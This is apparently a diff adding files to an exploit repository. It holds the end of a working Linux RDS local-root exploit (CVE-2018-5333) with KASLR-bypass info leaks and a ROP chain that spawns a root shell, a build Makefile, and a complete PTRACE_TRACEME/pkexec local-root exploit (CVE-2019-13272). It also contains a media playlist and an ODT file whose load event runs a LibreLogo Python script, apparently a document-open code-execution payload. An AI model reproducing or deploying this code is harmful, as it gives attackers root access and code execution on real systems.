+  struct perf_event_mmap_page *meta_page = NULL;
+  meta_page = mmap(NULL, (page_size * 2), PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+
+  if (meta_page == MAP_FAILED) {
+    dprintf("[-] mmap() failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  if (ioctl(fd, PERF_EVENT_IOC_ENABLE)) {
+    dprintf("[-] ioctl failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+  char *data_page = ((char *) meta_page) + page_size;
+
+  size_t progress = 0;
+  uint64_t last_head = 0;
+  size_t num_samples = 0;
+  unsigned long min_addr = ~0;
+  while (num_samples < 100) {
+    /* is reading from the meta_page racy? no idea */
+    while (meta_page->data_head == last_head);;
+    last_head = meta_page->data_head;
+
+    while (progress < last_head) {
+      struct __attribute__((packed)) sample {
+        struct perf_event_header header;
+        uint64_t ip;
+      } *here = (struct sample *) (data_page + progress % page_size);
+      switch (here->header.type) {
+      case PERF_RECORD_SAMPLE:
+        num_samples++;
+        if (here->header.size < sizeof(*here)) {
+          dprintf("[-] size too small.\n");
+          if (child) kill(child, SIGKILL);
+          if (fd > 0) close(fd);
+          return 0;
+        }
+
+        uint64_t prefix;
+        if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+          prefix = here->ip & ~0xfffff;
+        } else {
+          prefix = here->ip & ~0xffffff;
+        }
+
+        if (prefix < min_addr) min_addr = prefix;
+        break;
+      case PERF_RECORD_THROTTLE:
+      case PERF_RECORD_UNTHROTTLE:
+      case PERF_RECORD_LOST:
+        break;
+      default:
+        dprintf("[-] unexpected perf event: %x\n", here->header.type);
+        if (child) kill(child, SIGKILL);
+              if (fd > 0) close(fd);
+        return 0;
+      }
+      progress += here->header.size;
+    }
+    /* tell the kernel we read it. */
+    meta_page->data_tail = last_head;
+  }
+
+  if (child) kill(child, SIGKILL);
+  if (fd > 0) close(fd);
+  return min_addr;
+}
+#endif
+
+// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+unsigned long get_kernel_addr_mincore() {
+  unsigned char buf[getpagesize() / sizeof(unsigned char)];
+  unsigned long iterations = 20000000;
+  unsigned long addr = 0;
+
+  dprintf("[.] trying mincore info leak...\n");
+
+  if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+    dprintf("[-] target kernel does not permit mincore info leak\n");
+    return 0;
+  }
+
+  /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
+  if (mmap((void*)0x66000000, 0x20000000000,
+       PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+    dprintf("[-] mmap(): %m\n");
+    return 0;
+  }
+
+  int i;
+  for (i = 0; i <= iterations; i++) {
+    /* Touch a mishandle with this type mapping */
+    if (mincore((void*)0x86000000, 0x1000000, buf)) {
+      dprintf("[-] mincore(): %m\n");
+      return 0;
+    }
+
+    int n;
+    for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
+      addr = *(unsigned long*)(&buf[n]);
+      /* Kernel address space */
+      if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
+        addr &= 0xffffffffff000000ul;
+        if (munmap((void*)0x66000000, 0x20000000000))
+          dprintf("[-] munmap(): %m\n");
+        return addr;
+      }
+    }
+  }
+
+  if (munmap((void*)0x66000000, 0x20000000000))
+    dprintf("[-] munmap(): %m\n");
+
+  dprintf("[-] kernel base not found in mincore info leak\n");
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+  unsigned long addr = 0;
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+  addr = get_kernel_addr_kallsyms();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+  addr = get_kernel_addr_syslog();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_PERF
+  addr = get_kernel_addr_perf();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+  addr = get_kernel_addr_mincore();
+  if (addr) return addr;
+#endif
+
+  dprintf("[-] KASLR bypass failed, kernel base not found\n");
+  exit(EXIT_FAILURE);
+
+  return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+static void shell() {
+  if (getuid() == 0 && geteuid() == 0) {
+    dprintf("[+] got root\n");
+    system(SHELL);
+  } else {
+    dprintf("[-] failed\n");
+  }
+  exit(EXIT_FAILURE);
+}
+
+void fork_shell() {
+  pid_t rv;
+
+  rv = fork();
+  if (rv == -1) {
+    dprintf("[-] fork(): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (rv == 0)
+    shell();
+}
+
+int main(int argc, char *argv[]) {
+  if (argc > 1) SHELL = argv[1];
+  dprintf("Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)\n");
+
+  dprintf("[.] checking kernel version...\n");
+  detect_versions();
+  dprintf("[~] done, version looks good\n");
+
+#if ENABLE_SYSTEM_CHECKS
+  dprintf("[.] checking system...\n");
+  check_env();
+  dprintf("[~] done, looks good\n");
+#endif
+
+  dprintf("[.] mapping null address...\n");
+  map_null();
+  dprintf("[~] done, mapped null address\n");
+
+#if ENABLE_KASLR_BYPASS
+  dprintf("[.] KASLR bypass enabled, getting kernel base address\n");
+  KERNEL_BASE = get_kernel_addr();
+  dprintf("[.] done, kernel text:   %lx\n", KERNEL_BASE);
+#endif
+
+  unsigned long commit_creds =        (KERNEL_BASE + kernels[kernel].commit_creds);
+  unsigned long prepare_kernel_cred = (KERNEL_BASE + kernels[kernel].prepare_kernel_cred);
+  unsigned long xor_rdi =             (KERNEL_BASE + kernels[kernel].xor_rdi);
+  unsigned long mov_rdi_rax =         (KERNEL_BASE + kernels[kernel].mov_rdi_rax);
+  unsigned long xchg_esp =            (KERNEL_BASE + kernels[kernel].xchg_esp);
+  unsigned long swapgs =              (KERNEL_BASE + kernels[kernel].swapgs);
+  unsigned long iretq =               (KERNEL_BASE + kernels[kernel].iretq);
+
+  dprintf("[.] commit_creds:        %lx\n", commit_creds);
+  dprintf("[.] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
+
+  dprintf("[.] mmapping fake stack...\n");
+
+  uint64_t page_size = getpagesize();
+  uint64_t stack_aligned = (xchg_esp & 0x00000000fffffffful) & ~(page_size - 1);
+  uint64_t stack_offset = xchg_esp % page_size;
+
+  unsigned long *fake_stack = mmap((void*)stack_aligned, 0x200000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (fake_stack == MAP_FAILED) {
+    dprintf("[-] mmap(fake_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long *temp_stack = mmap((void*)0x30000000, 0x10000000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (temp_stack == MAP_FAILED) {
+    dprintf("[-] mmap(temp_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  static unsigned long result = 0;
+  unsigned long *data = (unsigned long *)0;
+  data[1] = (uint64_t)&result;
+  data[3] = xchg_esp;
+
+  save_state();
+  debug_enable_sigsev_handler();
+
+  fake_stack = (unsigned long *)(stack_aligned + stack_offset);
+
+  int i = 0;
+
+  fake_stack[i++] = xor_rdi;
+  fake_stack[i++] = prepare_kernel_cred;
+  fake_stack[i++] = mov_rdi_rax;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = commit_creds;
+
+  fake_stack[i++] = swapgs;
+  fake_stack[i++] = 0x12345678;
+
+  fake_stack[i++] = iretq;
+  fake_stack[i++] = (unsigned long)shell;
+  fake_stack[i++] = user_cs;
+  fake_stack[i++] = user_rflags;
+  fake_stack[i++] = (unsigned long)(temp_stack + 0x500000);
+  fake_stack[i++] = user_ss;
+
+  dprintf("[~] done, fake stack mmapped\n");
+
+  dprintf("[.] executing payload %p...\n", (void*)&shell);
+  trigger_bug();
+
+  return 0;
+}
+
@@ -0,0 +1,15 @@
+#EXTM3U
+#EXT-X-VERSION:3
+#EXT-X-TARGETDURATION:4
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:3.433333,
+epicsax0.ts
+#EXTINF:1.700000,
+epicsax1.ts
+#EXTINF:1.700000,
+epicsax2.ts
+#EXTINF:1.700000,
+epicsax3.ts
+#EXTINF:1.466667,
+epicsax4.ts
+#EXT-X-ENDLIST
@@ -0,0 +1,4 @@
+
+all:
+	x86_64-linux-musl-cc -static -s -pie poc.c -o exploit
+
@@ -0,0 +1,464 @@
+// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
+// Uses pkexec technique
+// ---
+// Original discovery and exploit author: Jann Horn
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
+// ---
+// <bcoles@gmail.com>
+// - added known helper paths
+// - added search for suitable helpers
+// - added automatic targeting
+// - changed target suid executable from passwd to pkexec
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272
+// ---
+// Tested on:
+// - Ubuntu 16.04.5 kernel 4.15.0-29-generic
+// - Ubuntu 18.04.1 kernel 4.15.0-20-generic
+// - Ubuntu 19.04 kernel 5.0.0-15-generic
+// - Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic
+// - Linux Mint 17.3 kernel 4.4.0-89-generic
+// - Linux Mint 18.3 kernel 4.13.0-16-generic
+// - Linux Mint 19 kernel 4.15.0-20-generic
+// - Xubuntu 16.04.4 kernel 4.13.0-36-generic
+// - ElementaryOS 0.4.1 4.8.0-52-generic
+// - Backbox 6 kernel 4.18.0-21-generic
+// - Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
+// - Kali kernel 4.19.0-kali5-amd64
+// - Redcore 1806 (LXQT) kernel 4.16.16-redcore
+// - MX 18.3 kernel 4.19.37-2~mx17+1
+// - RHEL 8.0 kernel 4.18.0-80.el8.x86_64
+// - Debian 9.4.0 kernel 4.9.0-6-amd64
+// - Debian 10.0.0 kernel 4.19.0-5-amd64
+// - Devuan 2.0.0 kernel 4.9.0-6-amd64
+// - SparkyLinux 5.8 kernel 4.19.0-5-amd64
+// - Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64
+// - Manjaro 18.0.3 kernel 4.19.23-1-MANJARO
+// - Mageia 6 kernel 4.9.35-desktop-1.mga6
+// - Antergos 18.7 kernel 4.17.6-1-ARCH
+// ---
+// user@linux-mint-19-2:~$ gcc -Wall --std=gnu99 -s poc.c -o ptrace_traceme_root
+// user@linux-mint-19-2:~$ ./ptrace_traceme_root
+// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
+// [.] Checking environment ...
+// [~] Done, looks good
+// [.] Searching for known helpers ...
+// [~] Found known helper: /usr/sbin/mate-power-backlight-helper
+// [.] Using helper: /usr/sbin/mate-power-backlight-helper
+// [.] Spawning suid process (/usr/bin/pkexec) ...
+// [.] Tracing midpid ...
+// [~] Attached to midpid
+// To run a command as administrator (user "root"), use "sudo <command>".
+// See "man sudo_root" for details.
+//
+// root@linux-mint-19-2:/home/user#
+// ---
+
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <stddef.h>
+#include <stdarg.h>
+#include <pwd.h>
+#include <sys/prctl.h>
+#include <sys/wait.h>
+#include <sys/ptrace.h>
+#include <sys/user.h>
+#include <sys/syscall.h>
+#include <sys/stat.h>
+#include <linux/elf.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define SAFE(expr) ({                   \
+  typeof(expr) __res = (expr);          \
+  if (__res == -1) {                    \
+    dprintf("[-] Error: %s\n", #expr);  \
+    return 0;                           \
+  }                                     \
+  __res;                                \
+})
+#define max(a,b) ((a)>(b) ? (a) : (b))
+
+/*
+ * execveat() syscall
+ * https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_64.tbl
+ */
+#ifndef __NR_execveat
+#  define __NR_execveat 322
+#endif
+
+static const char *SHELL = "/bin/bash";
+
+static int middle_success = 1;
+static int block_pipe[2];
+static int self_fd = -1;
+static int dummy_status;
+static const char *helper_path;
+static const char *pkexec_path = "/usr/bin/pkexec";
+static const char *pkaction_path = "/usr/bin/pkaction";
+struct stat st;
+
+const char *helpers[1024];
+
+const char *known_helpers[] = {
+  "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
+  "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
+  "/usr/lib/unity-settings-daemon/usd-backlight-helper",
+  "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
+  "/usr/lib/x86_64-linux-gnu/cinnamon-settings-daemon/csd-backlight-helper",
+  "/usr/sbin/mate-power-backlight-helper",
+  "/usr/bin/xfpm-power-backlight-helper",
+  "/usr/bin/lxqt-backlight_backend",
+  "/usr/libexec/gsd-wacom-led-helper",
+  "/usr/libexec/gsd-wacom-oled-helper",
+  "/usr/libexec/gsd-backlight-helper",
+  "/usr/lib/gsd-backlight-helper",
+  "/usr/lib/gsd-wacom-led-helper",
+  "/usr/lib/gsd-wacom-oled-helper",
+};
+
+/* temporary printf; returned pointer is valid until next tprintf */
+static char *tprintf(char *fmt, ...) {
+  static char buf[10000];
+  va_list ap;
+  va_start(ap, fmt);
+  vsprintf(buf, fmt, ap);
+  va_end(ap);
+  return buf;
+}
+
+/*
+ * fork, execute pkexec in parent, force parent to trace our child process,
+ * execute suid executable (pkexec) in child.
+ */
+static int middle_main(void *dummy) {
+  prctl(PR_SET_PDEATHSIG, SIGKILL);
+  pid_t middle = getpid();
+
+  self_fd = SAFE(open("/proc/self/exe", O_RDONLY));
+
+  pid_t child = SAFE(fork());
+  if (child == 0) {
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
+
+    SAFE(dup2(self_fd, 42));
+
+    /* spin until our parent becomes privileged (have to be fast here) */
+    int proc_fd = SAFE(open(tprintf("/proc/%d/status", middle), O_RDONLY));
+    char *needle = tprintf("\nUid:\t%d\t0\t", getuid());
+    while (1) {
+      char buf[1000];
+      ssize_t buflen = SAFE(pread(proc_fd, buf, sizeof(buf)-1, 0));
+      buf[buflen] = '\0';
+      if (strstr(buf, needle)) break;
+    }
+
+    /*
+     * this is where the bug is triggered.
+     * while our parent is in the middle of pkexec, we force it to become our
+     * tracer, with pkexec's creds as ptracer_cred.
+     */
+    SAFE(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
+
+    /*
+     * now we execute a suid executable (pkexec).
+     * Because the ptrace relationship is considered to be privileged,
+     * this is a proper suid execution despite the attached tracer,
+     * not a degraded one.
+     * at the end of execve(), this process receives a SIGTRAP from ptrace.
+     */
+    execl(pkexec_path, basename(pkexec_path), NULL);
+
+    dprintf("[-] execl: Executing suid executable failed");
+    exit(EXIT_FAILURE);
+  }
+
+  SAFE(dup2(self_fd, 0));
+  SAFE(dup2(block_pipe[1], 1));
+
+  /* execute pkexec as current user */
+  struct passwd *pw = getpwuid(getuid());
+  if (pw == NULL) {
+    dprintf("[-] getpwuid: Failed to retrieve username");
+    exit(EXIT_FAILURE);
+  }
+
+  middle_success = 1;
+  execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
+        helper_path,
+        "--help", NULL);
+  middle_success = 0;
+  dprintf("[-] execl: Executing pkexec failed");
+  exit(EXIT_FAILURE);
+}
+
+/* ptrace pid and wait for signal */
+static int force_exec_and_wait(pid_t pid, int exec_fd, char *arg0) {
+  struct user_regs_struct regs;
+  struct iovec iov = { .iov_base = &regs, .iov_len = sizeof(regs) };
+  SAFE(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
+  SAFE(waitpid(pid, &dummy_status, 0));
+  SAFE(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &iov));
+
+  /* set up indirect arguments */
+  unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
+  struct injected_page {
+    unsigned long argv[2];
+    unsigned long envv[1];
+    char arg0[8];
+    char path[1];
+  } ipage = {
+    .argv = { scratch_area + offsetof(struct injected_page, arg0) }
+  };
+  strcpy(ipage.arg0, arg0);
+  int i;
+  for (i = 0; i < sizeof(ipage)/sizeof(long); i++) {
+    unsigned long pdata = ((unsigned long *)&ipage)[i];
+    SAFE(ptrace(PTRACE_POKETEXT, pid, scratch_area + i * sizeof(long),
+                (void*)pdata));
+  }
+
+  /* execveat(exec_fd, path, argv, envv, flags) */
+  regs.orig_rax = __NR_execveat;
+  regs.rdi = exec_fd;
+  regs.rsi = scratch_area + offsetof(struct injected_page, path);
+  regs.rdx = scratch_area + offsetof(struct injected_page, argv);
+  regs.r10 = scratch_area + offsetof(struct injected_page, envv);
+  regs.r8 = AT_EMPTY_PATH;
+
+  SAFE(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &iov));
+  SAFE(ptrace(PTRACE_DETACH, pid, 0, NULL));
+  SAFE(waitpid(pid, &dummy_status, 0));
+
+  return 0;
+}
+
+static int middle_stage2(void) {
+  /* our child is hanging in signal delivery from execve()'s SIGTRAP */
+  pid_t child = SAFE(waitpid(-1, &dummy_status, 0));
+  return force_exec_and_wait(child, 42, "stage3");
+}
+
+// * * * * * * * * * * * * * * * * root shell * * * * * * * * * * * * * * * * *
+
+static int spawn_shell(void) {
+  SAFE(setresgid(0, 0, 0));
+  SAFE(setresuid(0, 0, 0));
+  execlp(SHELL, basename(SHELL), NULL);
+  dprintf("[-] execlp: Executing shell %s failed", SHELL);
+  exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * * *
+
+static int check_env(void) {
+  int warn = 0;
+  const char* xdg_session = getenv("XDG_SESSION_ID");
+
+  dprintf("[.] Checking environment ...\n");
+
+  if (stat(pkexec_path, &st) != 0) {
+    dprintf("[-] Could not find pkexec executable at %s\n", pkexec_path);
+    exit(EXIT_FAILURE);
+  }
+  if (stat(pkaction_path, &st) != 0) {
+    dprintf("[-] Could not find pkaction executable at %s\n", pkaction_path);
+    exit(EXIT_FAILURE);
+  }
+
+  if (stat("/dev/grsec", &st) == 0) {
+    dprintf("[-] Warning: grsec is in use\n");
+    warn++;
+  }
+  if (xdg_session == NULL) {
+    dprintf("[!] Warning: $XDG_SESSION_ID is not set\n");
+    warn++;
+  }
+  if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
+    dprintf("[!] Warning: Could not find active PolKit agent\n");
+    warn++;
+  }
+  if (stat("/usr/sbin/getsebool", &st) == 0) {
+    if (system("/usr/sbin/getsebool deny_ptrace 2>&1 | /bin/grep -q on") == 0) {
+      dprintf("[!] Warning: SELinux deny_ptrace is enabled\n");
+      warn++;
+    }
+  }
+
+  dprintf("[~] Done, looks good\n");
+
+  return warn;
+}
+
+/*
+ * Use pkaction to search PolKit policy actions for viable helper executables.
+ * Check each action for allow_active=yes, extract the associated helper path,
+ * and check the helper path exists.
+ */
+int find_helpers() {
+  char cmd[1024];
+  snprintf(cmd, sizeof(cmd), "%s --verbose", pkaction_path);
+  FILE *fp;
+  fp = popen(cmd, "r");
+  if (fp == NULL) {
+    dprintf("[-] Failed to run: %s\n", cmd);
+    exit(EXIT_FAILURE);
+  }
+
+  char line[1024];
+  char buffer[2048];
+  int helper_index = 0;
+  int useful_action = 0;
+  static const char *needle = "org.freedesktop.policykit.exec.path -> ";
+  int needle_length = strlen(needle);
+
+  while (fgets(line, sizeof(line)-1, fp) != NULL) {
+    /* check the action uses allow_active=yes*/
+    if (strstr(line, "implicit active:")) {
+      if (strstr(line, "yes")) {
+        useful_action = 1;
+      }
+      continue;
+    }
+
+    if (useful_action == 0)
+      continue;
+    useful_action = 0;
+
+    /* extract the helper path */
+    int length = strlen(line);
+    char* found = memmem(&line[0], length, needle, needle_length);
+    if (found == NULL)
+      continue;
+
+    memset(buffer, 0, sizeof(buffer));
+    int i;
+    for (i = 0; found[needle_length + i] != '\n'; i++) {
+      if (i >= sizeof(buffer)-1)
+        continue;
+      buffer[i] = found[needle_length + i];
+    }
+
+    if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||
+      strstr(&buffer[0], "/cpugovctl") != 0 ||
+      strstr(&buffer[0], "/package-system-locked") != 0 ||
+      strstr(&buffer[0], "/cddistupgrader") != 0) {
+      dprintf("[.] Ignoring blacklisted helper: %s\n", &buffer[0]);
+      continue;
+    }
+
+    /* check the path exists */
+    if (stat(&buffer[0], &st) != 0)
+      continue;
+
+    helpers[helper_index] = strndup(&buffer[0], strlen(buffer));
+    helper_index++;
+
+    if (helper_index >= sizeof(helpers)/sizeof(helpers[0]))
+      break;
+  }
+
+  pclose(fp);
+  return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
+
+int ptrace_traceme_root() {
+  dprintf("[.] Using helper: %s\n", helper_path);
+
+  /*
+   * set up a pipe such that the next write to it will block: packet mode,
+   * limited to one packet
+   */
+  SAFE(pipe2(block_pipe, O_CLOEXEC|O_DIRECT));
+  SAFE(fcntl(block_pipe[0], F_SETPIPE_SZ, 0x1000));
+  char dummy = 0;
+  SAFE(write(block_pipe[1], &dummy, 1));
+
+  /* spawn pkexec in a child, and continue here once our child is in execve() */
+  dprintf("[.] Spawning suid process (%s) ...\n", pkexec_path);
+  static char middle_stack[1024*1024];
+  pid_t midpid = SAFE(clone(middle_main, middle_stack+sizeof(middle_stack),
+                            CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
+  if (!middle_success) return 1;
+
+  /*
+   * wait for our child to go through both execve() calls (first pkexec, then
+   * the executable permitted by polkit policy).
+   */
+  while (1) {
+    int fd = open(tprintf("/proc/%d/comm", midpid), O_RDONLY);
+    char buf[16];
+    int buflen = SAFE(read(fd, buf, sizeof(buf)-1));
+    buf[buflen] = '\0';
+    *strchrnul(buf, '\n') = '\0';
+    if (strncmp(buf, basename(helper_path), 15) == 0)
+      break;
+    usleep(100000);
+  }
+
+  /*
+   * our child should have gone through both the privileged execve() and the
+   * following execve() here
+   */
+  dprintf("[.] Tracing midpid ...\n");
+  SAFE(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
+  SAFE(waitpid(midpid, &dummy_status, 0));
+  dprintf("[~] Attached to midpid\n");
+
+  force_exec_and_wait(midpid, 0, "stage2");
+  exit(EXIT_SUCCESS);
+}
+
+int main(int argc, char **argv) {
+  if (strcmp(argv[0], "stage2") == 0)
+    return middle_stage2();
+  if (strcmp(argv[0], "stage3") == 0)
+    return spawn_shell();
+
+  dprintf("Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)\n");
+
+  check_env();
+
+  if (argc > 1 && strcmp(argv[1], "check") == 0) {
+    exit(0);
+  }
+
+  /* Search for known helpers defined in 'known_helpers' array */
+  dprintf("[.] Searching for known helpers ...\n");
+  int i;
+  for (i=0; i<sizeof(known_helpers)/sizeof(known_helpers[0]); i++) {
+    if (stat(known_helpers[i], &st) == 0) {
+      helper_path = known_helpers[i];
+      dprintf("[~] Found known helper: %s\n", helper_path);
+      ptrace_traceme_root();
+    }
+  }
+
+  /* Search polkit policies for helper executables */
+  dprintf("[.] Searching for useful helpers ...\n");
+  find_helpers();
+  for (i=0; i<sizeof(helpers)/sizeof(helpers[0]); i++) {
+    if (helpers[i] == NULL)
+      break;
+
+    if (stat(helpers[i], &st) == 0) {
+      helper_path = helpers[i];
+      ptrace_traceme_root();
+    }
+  }
+
+  return 0;
+}
@@ -0,0 +1,42 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:officeooo="http://openoffice.org/2009/office" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.text">
+ <office:settings><config:config-item-set config:name="ooo:configuration-settings"><config:config-item config:name="LoadReadonly" config:type="boolean">true</config:config-item></config:config-item-set></office:settings>
+ <office:scripts><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:load" xlink:href="vnd.sun.star.script:LibreLogo|LibreLogo.py$run?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners></office:scripts>
+ <office:styles>
+  <style:default-style style:family="graphic">
+   <style:graphic-properties svg:stroke-color="#3465a4" draw:fill-color="#729fcf" fo:wrap-option="no-wrap" draw:shadow-offset-x="0.1181in" draw:shadow-offset-y="0.1181in" draw:start-line-spacing-horizontal="0.1114in" draw:start-line-spacing-vertical="0.1114in" draw:end-line-spacing-horizontal="0.1114in" draw:end-line-spacing-vertical="0.1114in" style:flow-with-text="false"/>
+   <style:paragraph-properties style:text-autospace="ideograph-alpha" style:line-break="strict" style:font-independent-line-spacing="false">
+    <style:tab-stops/>
+   </style:paragraph-properties>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN"/>
+  </style:default-style>
+  <style:default-style style:family="paragraph">
+   <style:paragraph-properties fo:orphans="2" fo:widows="2" fo:hyphenation-ladder-count="no-limit" style:text-autospace="ideograph-alpha" style:punctuation-wrap="hanging" style:line-break="strict" style:tab-stop-distance="0.4925in" style:writing-mode="page"/>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
+  </style:default-style>
+  <style:default-style style:family="table">
+   <style:table-properties table:border-model="collapsing"/>
+  </style:default-style>
+  <style:default-style style:family="table-row">
+   <style:table-row-properties fo:keep-together="auto"/>
+  </style:default-style>
+  <style:style style:name="Standard" style:family="paragraph" style:class="text" fo:color="#ffffff"/>
+  <style:style style:name="Text_20_body" style:display-name="Text body" style:family="paragraph" style:parent-style-name="Standard" style:class="text">
+   <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.0972in" loext:contextual-spacing="false" fo:line-height="20%"/>
+  </style:style>
+  <style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text">
+   <style:text-properties fo:color="#ffffff" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/>
+  </style:style>
